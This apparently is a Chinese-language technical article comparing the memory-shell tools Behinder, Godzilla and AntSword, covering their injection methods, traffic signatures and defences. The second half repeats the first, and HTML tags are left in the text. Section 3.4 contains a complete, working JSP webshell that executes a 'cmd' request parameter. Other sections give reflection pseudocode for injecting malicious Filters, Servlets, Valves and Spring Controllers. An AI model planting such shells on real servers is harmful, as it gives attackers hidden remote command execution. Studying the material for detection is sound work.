内存马连接工具技术特性与攻防分析<\/h1>

1. 冰蝎(Behinder)技术分析<\/h2>

1.1 核心特点<\/h3>

采用"无文件免杀+动态内存注入"原理<\/li>
配合AES加密通信<\/li>
基于Filter或Servlet挂载<\/li>

利用漏洞作为入口点注入Java Agent或Loader<\/li> <\/ul>

1.2 注入过程<\/h3>

通过反序列化漏洞(如WebLogic T3、Shiro反序列化)或文件上传作为跳板<\/li>
Loader执行后获取Web容器上下文对象<\/li>

通过反射调用addFilter、addServlet或直接修改容器内部结构<\/li> <\/ol>

1.3 通信协议<\/h3>

自定义AES对称加密协议<\/li>
密钥在内存马注入时协商或硬编码<\/li>

流量为经过AES加密处理的二进制数据<\/li> <\/ul>

1.4 典型内存马类型<\/h3>

JSP内存马<\/li>
Tomcat Filter内存马<\/li>

Spring Controller内存马<\/li> <\/ul>

1.5 Behinder-Filter型内存马技术细节<\/h3>

动态获取ApplicationFilterChain对象<\/li>
通过反射机制修改内部Filter集合<\/li>

注入自定义恶意Filter实例到请求处理链<\/li> <\/ol>

\/\/ 伪代码示例
<\/span><\/span><\/span><\/span>ServletContext servletContext =<\/span> getServletContextFromRequest(<\/span>request);<\/span>
<\/span><\/span>Object applicationFilterChain =<\/span> getApplicationFilterChain();<\/span>
<\/span><\/span>byte<\/span>[]<\/span> maliciousFilterBytes =<\/span> generateBehinderFilterBytecode();<\/span>
<\/span><\/span>Class<?><\/span> maliciousFilterClass =<\/span> defineClass(<\/span>maliciousFilterBytes);<\/span>
<\/span><\/span>Filter maliciousFilter =<\/span> (<\/span>Filter)<\/span> maliciousFilterClass.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>\/\/ 后续通过反射注入Filter到FilterChain
<\/span><\/span><\/span><\/code><\/pre>1.6 Behinder-Servlet型内存马技术细节<\/h3>

调用ServletContext.addServlet API<\/li>
动态注册新的恶意Servlet<\/li>
映射到攻击者自定义URL路径<\/li>
<\/ol>
\/\/ 伪代码示例
<\/span><\/span><\/span><\/span>ServletContext servletContext =<\/span> getServletContextFromRequest(<\/span>request);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> maliciousServletBytes =<\/span> generateBehinderServletBytecode();<\/span>
<\/span><\/span>Class<?><\/span> maliciousServletClass =<\/span> defineClass(<\/span>maliciousServletBytes);<\/span>
<\/span><\/span>Servlet maliciousServlet =<\/span> (<\/span>Servlet)<\/span> maliciousServletClass.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>ServletRegistration.<\/span>Dynamic<\/span> dynamic =<\/span> servletContext.<\/span>addServlet<\/span>(<\/span>"behinderServlet"<\/span>,<\/span> maliciousServlet);<\/span>
<\/span><\/span>dynamic.<\/span>addMapping<\/span>(<\/span>"\/behinderShell"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>1.7 流量特征<\/h3>

POST请求，Body数据是AES加密+Base64编码的二进制串<\/li>
请求URL通常是内存马注入的合法路径或新注册路径<\/li>
参数名通常为随机字符串或可配置<\/li>
<\/ul>
示例请求：<\/p>
POST \/index.jsp HTTP\/1.1
Host: example.com
Content-Type: application\/x-www-form-urlencoded
[随机参数名]=[Base64(AES加密数据)]
<\/code><\/pre>
2. 哥斯拉(Godzilla)技术分析<\/h2>
2.1 核心特点<\/h3>

以JSP Webshell起家，配套各种内存马注入器<\/li>
多种编码器+插件<\/li>
注重免杀与长连接管理<\/li>
支持多语言(Java、PHP、ASP、ASP.NET等)<\/li>
<\/ul>
2.2 核心思路<\/h3>

上传基础JSP马作为Loader入口<\/li>
基础马加载Memory Shell Loader<\/li>
Loader执行内存马注入工作<\/li>
<\/ol>
2.3 通信加密<\/h3>

AES加密+Base64编码<\/li>
可自定义HTTP Header和参数名<\/li>
流量模拟正常HTTP表单传输<\/li>
<\/ul>
2.4 免杀特性<\/h3>

动态生成字节码<\/li>
加密数据<\/li>
插件化机制可替换加密算法和编码器<\/li>
<\/ul>
2.5 Godzilla-Filter型内存马<\/h3>
\/\/ 伪代码示例
<\/span><\/span><\/span><\/span>byte<\/span>[]<\/span> godzillaLoaderBytes =<\/span> getBytesFromRequestParameter(<\/span>"loader"<\/span>);<\/span>
<\/span><\/span>Class<?><\/span> godzillaLoaderClass =<\/span> defineClass(<\/span>godzillaLoaderBytes);<\/span>
<\/span><\/span>Object loaderInstance =<\/span> godzillaLoaderClass.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>Method injectFilterMethod =<\/span> godzillaLoaderClass.<\/span>getMethod<\/span>(<\/span>"injectFilter"<\/span>,<\/span> ServletContext.<\/span>class<\/span>,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>injectFilterMethod.<\/span>invoke<\/span>(<\/span>loaderInstance,<\/span> servletContext,<\/span> "\/godzillaFilterPath"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>2.6 Godzilla-Valve型内存马<\/h3>

获取Tomcat的Engine或Host对象的Pipeline<\/li>
通过反射调用addValve方法<\/li>
注入自定义恶意Valve实例<\/li>
<\/ol>
\/\/ 伪代码示例
<\/span><\/span><\/span><\/span>Server server =<\/span> getTomcatServerInstance();<\/span>
<\/span><\/span>Pipeline pipeline =<\/span> server.<\/span>findService<\/span>(<\/span>"Catalina"<\/span>).<\/span>getContainer<\/span>().<\/span>getPipeline<\/span>();<\/span>
<\/span><\/span>byte<\/span>[]<\/span> maliciousValveBytes =<\/span> generateGodzillaValveBytecode();<\/span>
<\/span><\/span>Class<?><\/span> maliciousValveClass =<\/span> defineClass(<\/span>maliciousValveBytes);<\/span>
<\/span><\/span>Valve maliciousValve =<\/span> (<\/span>Valve)<\/span> maliciousValveClass.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>Method addValveMethod =<\/span> Pipeline.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"addValve"<\/span>,<\/span> Valve.<\/span>class<\/span>);<\/span>
<\/span><\/span>addValveMethod.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>addValveMethod.<\/span>invoke<\/span>(<\/span>pipeline,<\/span> maliciousValve);<\/span>
<\/span><\/span><\/code><\/pre>2.7 Godzilla-Spring型内存马<\/h3>

获取Spring应用上下文中的RequestMappingHandlerMapping Bean<\/li>
通过反射调用registerHandlerMethod<\/li>
注册动态生成的恶意Controller Bean<\/li>
<\/ol>
\/\/ 伪代码示例
<\/span><\/span><\/span><\/span>ApplicationContext context =<\/span> getSpringApplicationContext();<\/span>
<\/span><\/span>RequestMappingHandlerMapping handlerMapping =<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> maliciousControllerBytes =<\/span> generateGodzillaControllerBytecode();<\/span>
<\/span><\/span>Class<?><\/span> maliciousControllerClass =<\/span> defineClass(<\/span>maliciousControllerBytes);<\/span>
<\/span><\/span>Object maliciousController =<\/span> maliciousControllerClass.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>Method targetMethod =<\/span> maliciousControllerClass.<\/span>getMethod<\/span>(<\/span>"handleRequest"<\/span>);<\/span>
<\/span><\/span>RequestMappingInfo mappingInfo =<\/span> RequestMappingInfo.<\/span>paths<\/span>(<\/span>"\/godzillaSpringShell"<\/span>).<\/span>build<\/span>();<\/span>
<\/span><\/span>Method registerHandlerMethod =<\/span> RequestMappingHandlerMapping.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>
<\/span><\/span>    "registerHandlerMethod"<\/span>,<\/span> Object.<\/span>class<\/span>,<\/span> Method.<\/span>class<\/span>,<\/span> RequestMappingInfo.<\/span>class<\/span>);<\/span>
<\/span><\/span>registerHandlerMethod.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>registerHandlerMethod.<\/span>invoke<\/span>(<\/span>handlerMapping,<\/span> maliciousController,<\/span> targetMethod,<\/span> mappingInfo);<\/span>
<\/span><\/span>handlerMapping.<\/span>afterPropertiesSet<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>2.8 流量特征<\/h3>

POST请求体包含Base64编码的AES加密数据<\/li>
参数名和值可高度混淆或随机<\/li>
User-Agent可能含"Godzilla"(可自定义)<\/li>
<\/ul>
示例请求：<\/p>
POST \/index.jsp HTTP\/1.1
Host: example.com
Content-Type: application\/x-www-form-urlencoded
pass=[Base64(AES加密数据)]&sessionid=[Base64(AES加密数据)]
<\/code><\/pre>
3. 蚁剑(AntSword)技术分析<\/h2>
3.1 核心特点<\/h3>

早期偏向PHP，JSP是次要<\/li>
主要用于管理传统文件型Webshell<\/li>
后期支持内存马和自定义编码器<\/li>
高度自定义自由度<\/li>
<\/ul>
3.2 核心思路<\/h3>

部署JSP后门文件作为入口<\/li>
通过后门执行Java代码<\/li>
上传并执行定制Java类(MemoryShellLoader)<\/li>
Loader动态注册恶意组件<\/li>
<\/ol>
3.3 通信加密<\/h3>

支持自定义编码器<\/li>
可以是简单Base64或复杂加密算法<\/li>
流量特征高度依赖编码器<\/li>
<\/ul>
3.4 AntSword-JSP内存马示例<\/h3>
<%@ page import="java.io.*,java.util.*,java.lang.reflect.*,javax.servlet.*,javax.servlet.http.*"%>
<%
String cmd = request.getParameter("cmd");
if (cmd != null && !cmd.isEmpty()) {
    try {
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line;
        StringBuilder sb = new StringBuilder();
        while ((line = br.readLine()) != null) {
            sb.append(line).append("\n");
        }
        out.println(sb.toString());
    } catch (Exception e) {
        out.println(e.getMessage());
    }
}
%>
<\/code><\/pre>
3.5 流量特征<\/h3>

默认Base64编码：参数为Base64编码的命令或代码<\/li>
自定义编码器：特征随编码器变化<\/li>
参数名可自定义<\/li>
<\/ul>
示例请求：<\/p>
POST \/shell.jsp HTTP\/1.1
Host: example.com
Content-Type: application\/x-www-form-urlencoded
z1=Q2xhc3MuZm9yTmFtZSgiYW50c3dvcmQuTG9hZGVyIikuZ2V0TWV0aG9kKCJpbmplY3QiL...
<\/code><\/pre>
4. 工具对比<\/h2>



特性<\/th>
冰蝎(Behinder)<\/th>
哥斯拉(Godzilla)<\/th>
蚁剑(AntSword)<\/th>
<\/tr>
<\/thead>


主打<\/td>
内存马远控<\/td>
内存马+多语言支持<\/td>
文件型马管理+自定义内存注入<\/td>
<\/tr>

通信<\/td>
AES加密(自定义协议)<\/td>
AES+Base64<\/td>
可自定义编码器<\/td>
<\/tr>

默认支持马型<\/td>
Filter、Servlet、Valve、Spring Controller<\/td>
Filter、Valve、Spring Controller、Listener<\/td>
主要依赖用户自定义注入<\/td>
<\/tr>

特点<\/td>
流量特征隐蔽、持久化强<\/td>
插件化丰富、支持跨语言<\/td>
社区脚本多、自定义自由度高<\/td>
<\/tr>

常用场景<\/td>
红队内网持久化、Web应用RCE后门<\/td>
内网后渗透横向、多环境适配<\/td>
传统WebShell管理、二次利用<\/td>
<\/tr>

流量特征<\/td>
POST请求，参数值AES加密+Base64<\/td>
POST请求，参数值AES加密+Base64，User-Agent可能含"Godzilla"<\/td>
POST请求，参数值取决于编码器(多为Base64)<\/td>
<\/tr>

核心注入<\/td>
内置高度集成、混淆的Loader<\/td>
内置模块化Loader<\/td>
依赖外部注入脚本<\/td>
<\/tr>
<\/tbody>
<\/table>
5. 典型攻击流程(共性)<\/h2>

获取初始权限：通过应用程序漏洞(文件上传、反序列化、RCE等)<\/li>
通过初步落地脚本执行Loader<\/li>
Loader通过反射\/类加载器注入恶意字节码<\/li>
动态注册挂钩点(FilterChain、ServletContext等)<\/li>
后续命令通过自定义加密协议远程发送<\/li>
流量伪装成正常业务<\/li>
持久化驻留<\/li>
<\/ol>
6. 防御关键点<\/h2>
6.1 技术防御措施<\/h3>


禁用危险的动态加载点：<\/p>

限制defineClass、TemplatesImpl、BCEL等危险方法<\/li>
监控类加载行为<\/li>
<\/ul>
<\/li>

WAF\/IPS配置：<\/p>

检测高危关键字(eval、exec、ProcessBuilder)<\/li>
识别异常HTTP方法、隐藏参数<\/li>
检测特征性流量(特定User-Agent、异常Base64参数等)<\/li>
<\/ul>
<\/li>

部署EDR\/HIDS与内存巡检：<\/p>

实时监控JVM进程行为<\/li>
使用Arthas、MAT等工具定期分析内存快照<\/li>
查找动态生成的类、可疑字节数组和反射调用链<\/li>
<\/ul>
<\/li>

运行时组件比对与基线管理：<\/p>

定期比对Filter、Servlet、Valve、Listener等组件的注册状态<\/li>
任何未在配置文件声明的动态注册组件视为异常<\/li>
<\/ul>
<\/li>
<\/ol>
6.2 管理防御措施<\/h3>


加固上传点与反序列化点：<\/p>

严格校验文件上传(MIME类型、内容、后缀名)<\/li>
反序列化入口使用白名单机制<\/li>
禁用危险的类<\/li>
<\/ul>
<\/li>

限制可执行文件和类白名单：<\/p>

实施严格的应用程序控制<\/li>
限制可执行的二进制文件和可加载的类<\/li>
<\/ul>
<\/li>

日志审计与SIEM联动：<\/p>

收集Web服务器访问日志、应用日志、安全设备日志<\/li>
SIEM系统关联分析<\/li>
配置告警规则识别异常行为<\/li>
<\/ul>
<\/li>
<\/ol>
7. 总结<\/h2>
内存马技术已成为现代Web安全攻防的重要战场。冰蝎、哥斯拉和蚁剑作为主流工具，各有特点：冰蝎专注于内存马的隐蔽性和持久化，哥斯拉强调多语言支持和插件化，蚁剑则提供高度自定义能力。防御方需要从技术和管理两个层面构建纵深防御体系，重点关注动态加载行为监控、内存状态检测和运行时组件基线管理，才能有效应对日益复杂的内存马威胁。<\/p>

特性<\/th>	冰蝎(Behinder)<\/th>	哥斯拉(Godzilla)<\/th>	蚁剑(AntSword)<\/th> <\/tr> <\/thead>
主打<\/td>	内存马远控<\/td>	内存马+多语言支持<\/td>	文件型马管理+自定义内存注入<\/td> <\/tr>
通信<\/td>	AES加密(自定义协议)<\/td>	AES+Base64<\/td>	可自定义编码器<\/td> <\/tr>
默认支持马型<\/td>	Filter、Servlet、Valve、Spring Controller<\/td>	Filter、Valve、Spring Controller、Listener<\/td>	主要依赖用户自定义注入<\/td> <\/tr>
特点<\/td>	流量特征隐蔽、持久化强<\/td>	插件化丰富、支持跨语言<\/td>	社区脚本多、自定义自由度高<\/td> <\/tr>
常用场景<\/td>	红队内网持久化、Web应用RCE后门<\/td>	内网后渗透横向、多环境适配<\/td>	传统WebShell管理、二次利用<\/td> <\/tr>
流量特征<\/td>	POST请求，参数值AES加密+Base64<\/td>	POST请求，参数值AES加密+Base64，User-Agent可能含"Godzilla"<\/td>	POST请求，参数值取决于编码器(多为Base64)<\/td> <\/tr>
核心注入<\/td>	内置高度集成、混淆的Loader<\/td>	内置模块化Loader<\/td>	依赖外部注入脚本<\/td> <\/tr> <\/tbody> <\/table> 5. 典型攻击流程(共性)<\/h2> 获取初始权限：通过应用程序漏洞(文件上传、反序列化、RCE等)<\/li> 通过初步落地脚本执行Loader<\/li> Loader通过反射\/类加载器注入恶意字节码<\/li> 动态注册挂钩点(FilterChain、ServletContext等)<\/li> 后续命令通过自定义加密协议远程发送<\/li> 流量伪装成正常业务<\/li> 持久化驻留<\/li> <\/ol> 6. 防御关键点<\/h2> 6.1 技术防御措施<\/h3> 禁用危险的动态加载点：<\/p> 限制defineClass、TemplatesImpl、BCEL等危险方法<\/li> 监控类加载行为<\/li> <\/ul> <\/li> WAF\/IPS配置：<\/p> 检测高危关键字(eval、exec、ProcessBuilder)<\/li> 识别异常HTTP方法、隐藏参数<\/li> 检测特征性流量(特定User-Agent、异常Base64参数等)<\/li> <\/ul> <\/li> 部署EDR\/HIDS与内存巡检：<\/p> 实时监控JVM进程行为<\/li> 使用Arthas、MAT等工具定期分析内存快照<\/li> 查找动态生成的类、可疑字节数组和反射调用链<\/li> <\/ul> <\/li> 运行时组件比对与基线管理：<\/p> 定期比对Filter、Servlet、Valve、Listener等组件的注册状态<\/li> 任何未在配置文件声明的动态注册组件视为异常<\/li> <\/ul> <\/li> <\/ol> 6.2 管理防御措施<\/h3> 加固上传点与反序列化点：<\/p> 严格校验文件上传(MIME类型、内容、后缀名)<\/li> 反序列化入口使用白名单机制<\/li> 禁用危险的类<\/li> <\/ul> <\/li> 限制可执行文件和类白名单：<\/p> 实施严格的应用程序控制<\/li> 限制可执行的二进制文件和可加载的类<\/li> <\/ul> <\/li> 日志审计与SIEM联动：<\/p> 收集Web服务器访问日志、应用日志、安全设备日志<\/li> SIEM系统关联分析<\/li> 配置告警规则识别异常行为<\/li> <\/ul> <\/li> <\/ol> 7. 总结<\/h2> 内存马技术已成为现代Web安全攻防的重要战场。冰蝎、哥斯拉和蚁剑作为主流工具，各有特点：冰蝎专注于内存马的隐蔽性和持久化，哥斯拉强调多语言支持和插件化，蚁剑则提供高度自定义能力。防御方需要从技术和管理两个层面构建纵深防御体系，重点关注动态加载行为监控、内存状态检测和运行时组件基线管理，才能有效应对日益复杂的内存马威胁。<\/p>